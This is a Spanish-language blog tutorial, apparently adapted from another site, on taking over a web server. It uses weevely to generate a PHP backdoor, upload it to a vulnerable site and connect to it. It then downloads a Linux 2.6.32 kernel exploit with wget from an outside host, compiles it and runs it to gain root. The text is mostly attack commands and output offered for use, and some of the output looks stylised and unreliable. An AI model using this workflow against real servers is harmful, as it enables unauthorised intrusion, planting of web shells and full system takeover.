Hace poco conoci una herramienta weevely , una herramienta muy buena para cambiar el antiguo netcat este tutorial no es mio. fue tomado de otra pagina.. pero lo edite y quiero compartirlo con ustedes.
luego de subir el backdoor generado con weevely. sino lo ha generado usamos el comando en Backbox es:
weevely generate (nombre y ubicacion de backdoor) (pass)
ej:
weevely generate /dylan/backdoor.php backdoor
se ha generado en mi carpeta personal /dylan/backdoor.php
luego de subirla a el site vulnerable.. entonces ahora conectamos la backdoor usamos el comando.
weevely htpp://target.com/uploads/backdoor.php backdoor
nos vizualizara algo como esto:
———————————————————————————————-
________ __
| | | |—–.—-.-.–.—-’ |–.–.
| | | | -__| -__| | | -__| | | |
|________|_____|____|___/|____|__|___ | v0.7.1
|_____|
Stealth tiny web shell
[+] Starting terminal, shell probe may take a while
[+] List modules with <tab> and show help with :show [module name]
user@ServidorVulnerable : /home/user/public_html/uploads/
———————————————————————————————-
ejecutamos el comando uname -r -s
Linux 2.6.32 kernel
conociendo ahora el kernel crearemos una carpeta llamada /tmp
mkdir tmp
cd tmp
y ahora descargaremos el exploit para el kernel.
[user@ServidorVulnerable/tmp/]wget http://expoit-2.6.32.com/2.6.32.c
Downloading 2.6.32.c
File Transfer Complete —————–100% ———- 2.6.32.c
[user@ServidorVulnerable/tmp] ls
2.6.32.c
Directory Successfully listed.
[user@ServidorVulnerable/tmp] gcc 2.6.32.c -o hackall
-
-
done
[user@ServidorVulnerable/tmp] ./hackall
-
-
[user@ServidorVulnerable/tmp] id
uid=(root) gid=(root)
[hacker@target.com/tmp/pcp] Root Complete!!
Y asi hemos completado el root.
Feliz HappyHacking!
Acerca de Mi Dylan Irzi
Colombiano, WebMaster, Independent Security Researcher , Apasionado por la Seguridad Informatica, #WhiteHat. Programador. Co-Fundador y Dueño de WebSecurityDev.com